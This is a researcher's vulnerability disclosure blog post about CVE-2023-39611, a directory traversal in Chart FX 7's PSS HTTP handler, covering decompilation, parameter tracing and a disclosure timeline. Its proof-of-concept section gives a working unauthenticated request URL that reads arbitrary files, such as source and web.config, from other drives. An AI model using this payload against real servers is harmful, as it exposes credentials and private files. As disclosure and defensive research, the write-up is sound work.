My Chart FX 7 software investigation journey leading to a Directory Traversal vulnerability (CVE-2023–39611)
About the Software
Chart FX 7 is a data visualization library that allows developers to create a variety of charts. It supports various platforms and languages, providing tools for creating interactive and visually compelling charts in web and desktop applications. With a user-friendly interface, Chart FX 7 simplifies the integration of powerful data visualization capabilities into diverse software projects.
In this blog post we will focus on the v7.0.4962.20829 version.
Vulnerability
Directory Traversal (also known as Path Traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application. This might include application code and data, credentials for back-end systems, and sensitive operating system files.
Reverse Engineering Process
During my work as a penetration tester and red teamer in Sompo Digital Lab Tel Aviv, I encountered the Chart FX 7 product and decided to download the trial version and play with it.
I have downloaded the SoftwareFX’s Chart FX 7 for .NET based application trial version from the Software FX official site:
https://www.softwarefx.com/products/chartfx/visual-studio/chartfx-7/features.aspx
While analysing the file structure of the software I have noticed the ChartFX.PSS.HttpHandler.dll in the Bin directory.
The HTTP handler DLL files within the product directory are used to handle HTTP communication in ASP.NET web applications, therefore the ChartFX.PSS.HttpHandler.dll file needs to be added to the ASP.NET web application in order for ChartFX 7 to work.
I started to investigate the ChartFX 7 software by opening the ChartFX.PSS.HttpHandler.dll in the dnSpy de-compiler tool to decompile the executable file to C#.
Link to dnSpy tool: https://github.com/dnSpy/dnSpy
I found that the HTTP Handler passes the HTTP arguments to a PSS service using the TCP protocol on port 8082
I decided to search the PSS service that the HTTP Handler communicates with and to investigate its files. I found the PSS service on Task Manager and opened it’s files location.
The PSS service files are located under the “PSS” directory, I started from the ChartFX.PSS.Service.exe.config file, which contains configurations including an optional folder directory for the output files and the same TCP channel as I found above.
Next, I opened the ChartFX.PSS.Service.exe file in the dnSpy decompiler tool. Note that the used version is v7.0.4962.20829.
After following the code flow from the HTTP Handler to the PSS service and back, I came to those conclusions:
The HTTP request to the chartfx70/pss/ChartFX.aspx endpoint receives the following 3 parameters: id, type, mime.
1. The “id” parameter is comprised of a digit following a hyphen and then digits representing part of the filename — the part after the ‘-’ character of the parameter value will be interpreted as part of the filename to be read.
For example, in the following “id” value of “0–071217250”, the “071217250” will be part of the file name that the software will try to read.
2. The “type” parameter value is added to the end of the file name that the software will try to read.
For example, in the following “type” value of “png”, the file name that the software will try to read will end with “png”.
3. The “mime” parameter value determines the content type header for the HTTP response. Note that this parameter is not used in the construction of the file name to be read.
For example, in the following “mime” value of “image/png”, the value of the HTTP response Content-Type header will be “image/png”.
To explain the code flow, I will use the following unauthenticated HTTP GET request as an example:
http://localhost:2096/chartfx70/pss/ChartFX.aspx?id=0-071217250&type=png&mime=image%2Fpng
By following the arguments input passed to ChartFX.PSS.Service.exe I found that the software uses those arguments to determine the full path of the file to be returned to the client.
Here we can see that the software looks for the hyphen character and splits the “id” argument into two variables:
In our example, the “0–071217250” value will be split into “0” and “071217250”.
Here we can see that the software combines some strings to get the file name to be read:
In function c, the software combines the user’s current name(or “anonymous” if unauthenticated) to the end of the “this.a” variable, which contains the value of the A_2 parameter (shown in Figure 1.8).
In our example, the “(anonymous)” value will be combined with “071217250” to return the following string:”071217250(anonymous)”.
Then, in function a, the software will combine the “A_0” value, which contains the “type” argument value with the “this.c” variable which contains the returned string from function c.
In our example, the “png” value will be combined with “071217250(anonymous)” to return the following string: “071217250(anonymous)_png”.
Now, function b combines the “A_0” string, the string returned from function a (shown in Figure 1.9), with “this.o” variable which contains one of those options:
- The %TempPath% value, located in the ChartFX.PSS.Service.exe.config (shown in image 1.1).
- The “Temp” folder, under the “PSS” directory.
Then, the software reads this file and returns it as an HTTP response:
So for our example, the software will return the following file:
C:\Program Files (x86)\Chart FX 7\PSS\Temp\071217250(anonymous)_png
Additionally, we found in the ChartFX.PSS.HttpHandler.dll file that the “mime” argument is used to determine the HTTP response content type:
Proof of Concept
Now, when we have all the relevant information such as the file name convention and the file location we can access all the files located on the filesystem that the PSS service has access to, including files located on other partitions.
Let’s show some examples:
Example 1: File system files located on the same partition (drive letter C) as the PSS service output files folder.
the following request will return the C:\windows\win.ini file with the “image/png” content type (the number of dot-dot-slash needed depends on the %TempPath% value located in the ChartFX.PSS.Service.exe.config or “Temp” folder, under the “PSS” directory in my situation).
Example 2: Source code file located on another partition (drive letter D).
Payload: http://localhost:2096/chartfx70/pss/ChartFX.aspx?id=0-d:&type=\\..\aa\Default.aspx&mime=text/html
The C# Path.Combine function allows the second argument to overwrite the first one in case the second argument starts with a drive letter.
In this example, the second argument will be d:(anonymous)\..\aa\Default.aspx, which will read the D:\aa\Default.aspx file and represent it as an ASPX file(since the content type is “text\html”).
Note that since the HTTP response content type is “text\html”, attackers may potentially exploit attacks such as XSS.
Example 3: Configuration file located on another partition (drive letter D).
In this example, the second argument will be d:(anonymous)\..\web.config, which will read the D:\web.config file and download it to our machine from the browser (since the content type is “application\x-msdownload”).
This vulnerability allows unauthenticated users to traverse the path of the web server in order to access and download files located on the hosting server filesystem that should not be publicly accessible.
CVE ID: CVE-2023–39611
Disclosure Timeline
Reported to the vendor: Feb 2023
Reported to the MITRE: 27th Jul 2023
CVE Assigned: 28th Aug 2023
Discovered By
Ariel Breisacher, Sompo Digital Lab Tel Aviv — Cyber Center of Excellence
References
My LinkedIn: https://il.linkedin.com/in/ariel-breisacher-ba3079211
About Sompo Digital Lab Tel Aviv: https://sompo.io/en/about
